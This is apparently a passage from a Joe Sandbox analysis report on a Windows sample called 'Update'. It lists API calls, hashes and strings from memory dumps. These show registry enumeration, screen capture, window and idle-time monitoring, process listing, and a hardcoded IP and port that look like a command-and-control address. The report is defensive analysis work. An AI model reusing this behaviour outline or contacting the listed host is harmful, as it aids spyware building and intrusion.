                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateThread_strlen$CloseFileHandleModuleNameObjectSingleWait
                                                                                                • String ID: IiViS$Update.d$Update.d$dll
                                                                                                • API String ID: 632893256-1826472805
                                                                                                • Opcode ID: e17a40a0d196cccc39a5dcf834a0ffc1747dcfa1bad47f68e6cad15058582d28
                                                                                                • Instruction ID: 32d1bc56822e6e6be771d864fb77fe6160d7303fbc4eb7b4777fa9f10f066ff6
                                                                                                • Opcode Fuzzy Hash: e17a40a0d196cccc39a5dcf834a0ffc1747dcfa1bad47f68e6cad15058582d28
                                                                                                • Instruction Fuzzy Hash: D3D115B2D10208AFDB14DFB8DD867EEB7F5AF44304F148528E419A7780E7759A88CB91
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F64C2
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Software\Tencent\Plugin\VAS,00000000,000F003F,?), ref: 037F64E2
                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,?,?,?,00000000,00000000), ref: 037F6524
                                                                                                • _memset.LIBCMT ref: 037F6560
                                                                                                • _memset.LIBCMT ref: 037F658E
                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65BA
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65C3
                                                                                                • lstrlenW.KERNEL32(?,?,?,?,00000000,00000AD4,75BF73E0), ref: 037F65D5
                                                                                                • RegCloseKey.ADVAPI32(?,00000000,00000AD4,75BF73E0), ref: 037F6625
                                                                                                • lstrlenW.KERNEL32(?), ref: 037F6635
                                                                                                Strings
                                                                                                • Software\Tencent\Plugin\VAS, xrefs: 037F64D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memsetlstrlen$CloseEnumInfoOpenQuery
                                                                                                • String ID: Software\Tencent\Plugin\VAS
                                                                                                • API String ID: 2921034913-3343197220
                                                                                                • Opcode ID: adf37bae46440abb1102809172ac3b6dd58a67fa109fd32e7b277aae7fc7fba0
                                                                                                • Instruction ID: 9b7f2cd12459d2cfab9644578141d4bf32b32555d78c49565dfe7b4853249b26
                                                                                                • Opcode Fuzzy Hash: adf37bae46440abb1102809172ac3b6dd58a67fa109fd32e7b277aae7fc7fba0
                                                                                                • Instruction Fuzzy Hash: DA4179F5A40218AFDB24DB94CD85FEAB37DEB44700F0045D9F709B7185EA70AA858F64
                                                                                                APIs
                                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 037FA48D
                                                                                                • _malloc.LIBCMT ref: 037FA4D1
                                                                                                • _free.LIBCMT ref: 037FA503
                                                                                                • GdipGetImageEncoders.GDIPLUS(?,?,00000008), ref: 037FA522
                                                                                                • GdipSaveImageToStream.GDIPLUS(00000000,?,?,00000000), ref: 037FA594
                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 037FA59F
                                                                                                • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 037FA5C5
                                                                                                • GdipDisposeImage.GDIPLUS(00000000), ref: 037FA5DD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Gdip$Image$DisposeEncoders$BitmapCreateFromSaveSizeStream_free_malloc
                                                                                                • String ID: &
                                                                                                • API String ID: 2794124522-3042966939
                                                                                                • Opcode ID: 456ab7cb3bb9e0fdba0be2d6e013818bcf81444e8102d0f77ad3d8b07f4668e9
                                                                                                • Instruction ID: a73610f34b7740c6ff2d80ca241304291af0cc6333c674c02c783b458ee34895
                                                                                                • Opcode Fuzzy Hash: 456ab7cb3bb9e0fdba0be2d6e013818bcf81444e8102d0f77ad3d8b07f4668e9
                                                                                                • Instruction Fuzzy Hash: D95143B5A006199FDB44DFA4C848AFEB7B8FF48710F048559EA19AB350D734A905CFA1
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                                • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                                • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                                • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                                • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                • String ID: IpDates_info$SOFTWARE
                                                                                                • API String ID: 864241144-2243437601
                                                                                                • Opcode ID: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                                • Instruction ID: c351098f3a10662c2abe80f3babca39824d4604c0415f8e3891e9891bb32f169
                                                                                                • Opcode Fuzzy Hash: fa41b33889329ce33d54072f6f587efc439d217482355cea30f751f095a89e77
                                                                                                • Instruction Fuzzy Hash: 184146316442819FF310CF308C45F6B7BB5FB453C6F994068E581CA186D3B2EA42C7A2
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE,00000000,00000102,?), ref: 10005382
                                                                                                • RegDeleteValueW.KERNEL32(?,IpDates_info), ref: 10005392
                                                                                                • RegSetValueExW.KERNEL32(?,IpDates_info,00000000,00000003,1001C6E0,000012A0), ref: 100053B0
                                                                                                • RegCloseKey.KERNEL32(?), ref: 100053BB
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?), ref: 1000540F
                                                                                                • GetExitCodeProcess.KERNEL32(00000000,?), ref: 1000541B
                                                                                                • Sleep.KERNEL32(00000BB8), ref: 10005434
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: OpenProcessValue$CloseCodeDeleteExitSleep
                                                                                                • String ID: IpDates_info$SOFTWARE
                                                                                                • API String ID: 864241144-2243437601
                                                                                                • Opcode ID: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                                • Instruction ID: f7f7705b5b84b7b191dcdb77494346d14e222b8940c5b100b936b40375e1b217
                                                                                                • Opcode Fuzzy Hash: e48445a0fb638aff792993f9711fe44b6994354607bef0c7859c4fe8ed55e572
                                                                                                • Instruction Fuzzy Hash: B731C1306443819FF315CF308848B6B7BF6FB493C6F9944A8F5859A146D3B2DA46C761
                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,6CA99F53,Update.d), ref: 6CA98017
                                                                                                • FindResourceW.KERNEL32(00000000,004F0043), ref: 6CA98066
                                                                                                • LoadResource.KERNEL32(00000000,00000000), ref: 6CA98074
                                                                                                • SizeofResource.KERNEL32(00000000,00000000), ref: 6CA9807E
                                                                                                • LockResource.KERNEL32(00000000), ref: 6CA98087
                                                                                                  • Part of subcall function 6CA96B10: _strlen.LIBCMT ref: 6CA96B9F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$FindHandleLoadLockModuleSizeof_strlen
                                                                                                • String ID: C$I$N$T
                                                                                                • API String ID: 415223560-3924500842
                                                                                                • Opcode ID: 2d846e643febf93e601764f86b88515b35b93f3af34d0a5b74d1b696c7dd91f9
                                                                                                • Instruction ID: c8939b94f067e90977207cdc0b101f1a525511291af70129ca4f3ad7800edd8d
                                                                                                • Opcode Fuzzy Hash: 2d846e643febf93e601764f86b88515b35b93f3af34d0a5b74d1b696c7dd91f9
                                                                                                • Instruction Fuzzy Hash: 3411D8B0A05340ABD7048B348D49A7B77ECEF86208F045919FC4AC6301FB759E89C7A6
                                                                                                APIs
                                                                                                  • Part of subcall function 6CAB9FEC: CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6CAB9C90,?,?,00000000,?,6CAB9C90,FFFFFFFF,0000000C), ref: 6CABA009
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB9CFB
                                                                                                • __dosmaperr.LIBCMT ref: 6CAB9D02
                                                                                                • GetFileType.KERNEL32(00000000), ref: 6CAB9D0E
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CAB9D18
                                                                                                • __dosmaperr.LIBCMT ref: 6CAB9D21
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6CAB9D41
                                                                                                • CloseHandle.KERNEL32(6CAB07FB), ref: 6CAB9E8E
                                                                                                • GetLastError.KERNEL32 ref: 6CAB9EC0
                                                                                                • __dosmaperr.LIBCMT ref: 6CAB9EC7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                • String ID:
                                                                                                • API String ID: 4237864984-0
                                                                                                • Opcode ID: 6f3555b19342c8f9493bf4dcc3edac9de1bed850fc191f386e5d24e4d2fd40f7
                                                                                                • Instruction ID: b338368fe409ceeb57900ae895b2ec52318c6135d76fb8809f8cf5da948c5de5
                                                                                                • Opcode Fuzzy Hash: 6f3555b19342c8f9493bf4dcc3edac9de1bed850fc191f386e5d24e4d2fd40f7
                                                                                                • Instruction Fuzzy Hash: B7A13732A146459FCF0D9F78CD91BAD3BB8AB07328F18024AF811EB391D7349996C751
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: $,$.$jIk
                                                                                                • API String ID: 4218353326-3923260969
                                                                                                • Opcode ID: 7faf63af75a2c023205fc994bb37b380f8c779f343329f01b547ebcf635a4ea1
                                                                                                • Instruction ID: b99fa24e28070add7e9f192ecb636d6fd7dc1ef647ae65d077d5cdfa4cc2ee40
                                                                                                • Opcode Fuzzy Hash: 7faf63af75a2c023205fc994bb37b380f8c779f343329f01b547ebcf635a4ea1
                                                                                                • Instruction Fuzzy Hash: 0D82CB71D112688BEB24CF68C8953EDBBF2BF85304F158298D449AB691DB715EC8CF81
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,Console\0,00000000,000F003F,038112F8,4EB10097,00000001,00000000,00000000), ref: 037FCAB1
                                                                                                • RegQueryInfoKeyW.ADVAPI32(038112F8,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 037FCAE0
                                                                                                • _memset.LIBCMT ref: 037FCB44
                                                                                                • _memset.LIBCMT ref: 037FCB53
                                                                                                • RegEnumValueW.KERNEL32(038112F8,?,00000000,?,00000000,?,00000000,?), ref: 037FCB72
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                  • Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF756
                                                                                                  • Part of subcall function 037FF707: std::exception::exception.LIBCMT ref: 037FF770
                                                                                                  • Part of subcall function 037FF707: __CxxThrowException@8.LIBCMT ref: 037FF781
                                                                                                • RegCloseKey.KERNEL32(038112F8,?,?,?,?,?,?,?,?,?,?,?,00000000,038112F8,000000FF), ref: 037FCC83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _memsetstd::exception::exception$CloseEnumException@8InfoOpenQueryThrowValue_malloc
                                                                                                • String ID: Console\0
                                                                                                • API String ID: 1348767993-1253790388
                                                                                                • Opcode ID: a3a21e0cc6acf4690033f57cbef06a324dfbe804bd1a4f596c506c4aa1ea7595
                                                                                                • Instruction ID: 6de9fcbe1508db735eb89ab52070407eaef08fa5ff4d53e1cd9302c1996b9166
                                                                                                • Opcode Fuzzy Hash: a3a21e0cc6acf4690033f57cbef06a324dfbe804bd1a4f596c506c4aa1ea7595
                                                                                                • Instruction Fuzzy Hash: 82610EB5E00219AFDB04DFA8D884EAEB7F9FF49310F14466AE915EB345D7349901CBA0
                                                                                                APIs
                                                                                                  • Part of subcall function 037FF707: _malloc.LIBCMT ref: 037FF721
                                                                                                • _memset.LIBCMT ref: 037FBB21
                                                                                                • GetLastInputInfo.USER32(?), ref: 037FBB37
                                                                                                • GetTickCount.KERNEL32 ref: 037FBB3D
                                                                                                • wsprintfW.USER32 ref: 037FBB66
                                                                                                • GetForegroundWindow.USER32 ref: 037FBB6F
                                                                                                • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 037FBB83
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memsetwsprintf
                                                                                                • String ID: %d min
                                                                                                • API String ID: 3754759880-1947832151
                                                                                                • Opcode ID: 57dd58cee6f4ddaaaa507d53656a242d3ecee8e9303a6f9cae0efebc2ea1fded
                                                                                                • Instruction ID: b0a146d480dc2c616960640327464461ce6f21cadbfd9c065f83e60d010497fb
                                                                                                • Opcode Fuzzy Hash: 57dd58cee6f4ddaaaa507d53656a242d3ecee8e9303a6f9cae0efebc2ea1fded
                                                                                                • Instruction Fuzzy Hash: 364173B5900218AFCB10EFA4DC89E9FBBB8FF44710F188555E9099B355D6749A04CBE1
                                                                                                APIs
                                                                                                • GetCurrentProcessId.KERNEL32(4EB10097,00000000,00000000,75BF73E0,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6938
                                                                                                • OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6947
                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F6960
                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,038110DB,000000FF,?,037F6AB3,00000000), ref: 037F696B
                                                                                                • SysStringLen.OLEAUT32(00000000), ref: 037F69BE
                                                                                                • SysStringLen.OLEAUT32(00000000), ref: 037F69CC
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,038110DB,000000FF), ref: 037F6A2E
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,038110DB,000000FF), ref: 037F6A34
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcess$OpenString$CurrentToken
                                                                                                • String ID:
                                                                                                • API String ID: 429299433-0
                                                                                                • Opcode ID: c3633e7fde16416d8d1524190c3c639d643b9201bffe35dac1bacdc6fa0e6c08
                                                                                                • Instruction ID: 0f62b188b545d9c457a7bc11a17eea1da69f894cf9cb8fc84a8b915ed8932147
                                                                                                • Opcode Fuzzy Hash: c3633e7fde16416d8d1524190c3c639d643b9201bffe35dac1bacdc6fa0e6c08
                                                                                                • Instruction Fuzzy Hash: D241A5B2E406189FDB10DFA9CC84AAEF7F8FB44710F14466AEA55E7340D775A900CBA0
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: _strlen
                                                                                                • String ID: 137.220.229.61$18852$IP=$Port
                                                                                                • API String ID: 4218353326-240388825
                                                                                                • Opcode ID: cbc8b6de3b338c4ecdb770664263c114deeb92eecef5226bcf23edc711c65fa2
                                                                                                • Instruction ID: eb0fe263ee4a763f213f94252a1f9a9baded5df77a7ae74b95a9d8f2b8921b15
                                                                                                • Opcode Fuzzy Hash: cbc8b6de3b338c4ecdb770664263c114deeb92eecef5226bcf23edc711c65fa2
                                                                                                • Instruction Fuzzy Hash: 6B12B5B2910B008BD724CF38C9817A6B7F6FF89318F154A2DD49AC7B90EB35E5898751
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6CA980FE
                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 6CA98139
                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000), ref: 6CA9816C
                                                                                                • _strlen.LIBCMT ref: 6CA9818B
                                                                                                • Process32NextW.KERNEL32(?,?), ref: 6CA982EF
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 6CA982FD
                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 6CA98313
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcess32$ByteCharCreateFirstMultiNextSnapshotToolhelp32Wide_strlen
                                                                                                • String ID:
                                                                                                • API String ID: 1292832681-0
                                                                                                • Opcode ID: b580e68eb5294256331ff596eb77f948414fdb64e2bd32133bcc2bb30ff6f010
                                                                                                • Instruction ID: d9400265156d1bad37cb8dd6717935ac243b452876f8fa9b346429b675a6328c
                                                                                                • Opcode Fuzzy Hash: b580e68eb5294256331ff596eb77f948414fdb64e2bd32133bcc2bb30ff6f010
                                                                                                • Instruction Fuzzy Hash: 8F517B729193005BE3108F64CD82BDFB7E9AF85314F150A2AF959D7681E730D98C87A3
                                                                                                APIs
                                                                                                • _memset.LIBCMT ref: 037F6DD9
                                                                                                • RegOpenKeyExW.KERNEL32(80000001,03815164,00000000,00020019,75BF73E0), ref: 037F6DFC
                                                                                                • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 037F6E4A
                                                                                                • lstrcmpW.KERNEL32(?,03815148), ref: 037F6E60
                                                                                                • lstrcpyW.KERNEL32(037F56EA,?), ref: 037F6E72
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                                                                                • String ID: GROUP
                                                                                                • API String ID: 2102619503-2593425013
                                                                                                • Opcode ID: ea51f5ecf3b6a6172f6667bca8bbe70cbb6f8dc2b4e213faea6eb1e45fdf5337
                                                                                                • Instruction ID: 53a2dbf6826dd23011e264b2701efce000cc2c72e658c40f698347fd1012bb0b
                                                                                                • Opcode Fuzzy Hash: ea51f5ecf3b6a6172f6667bca8bbe70cbb6f8dc2b4e213faea6eb1e45fdf5337
                                                                                                • Instruction Fuzzy Hash: CB318571940319AFDB20DFA0DC89B9EB7BCFB08714F1042D9E515A7280DB74AA84CF50
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 037FFA4E
                                                                                                • __calloc_crt.LIBCMT ref: 037FFA5A
                                                                                                • __getptd.LIBCMT ref: 037FFA67
                                                                                                • CreateThread.KERNEL32(00000000,00000000,037FF9C4,00000000,00000000,037FE003), ref: 037FFA9E
                                                                                                • GetLastError.KERNEL32(?,00000000,?,?,037FE003,00000000,00000000,037F5F40,00000000,00000000,00000000), ref: 037FFAA8
                                                                                                • _free.LIBCMT ref: 037FFAB1
                                                                                                • __dosmaperr.LIBCMT ref: 037FFABC
                                                                                                  • Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_37f0000_Update.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 155776804-0
                                                                                                • Opcode ID: 3114d22e8ce343e6f2d1fb6580b7583d57ea945b0173ebaba03eb5c3e6c0408d
                                                                                                • Instruction ID: 54e646d689f13e25886af24ace3b23335075a4847421cee95e0fbf3f54d2ec7f
                                                                                                • Opcode Fuzzy Hash: 3114d22e8ce343e6f2d1fb6580b7583d57ea945b0173ebaba03eb5c3e6c0408d
                                                                                                • Instruction Fuzzy Hash: A511A536204706BFDB11FFE9EC8499B7798FF06A747144565FA14CA390DF71D4018A61
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 10007240
                                                                                                • __calloc_crt.LIBCMT ref: 1000724C
                                                                                                • __getptd.LIBCMT ref: 10007259
                                                                                                • CreateThread.KERNEL32(?,?,100071B6,00000000,?,?), ref: 10007290
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 1000729A
                                                                                                • _free.LIBCMT ref: 100072A3
                                                                                                • __dosmaperr.LIBCMT ref: 100072AE
                                                                                                  • Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_10000000_Update.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 155776804-0
                                                                                                • Opcode ID: d853c5aad6a4ca1283704040be1a2fdba58bd4e9b88c6b00cf5b9d9771d5e89a
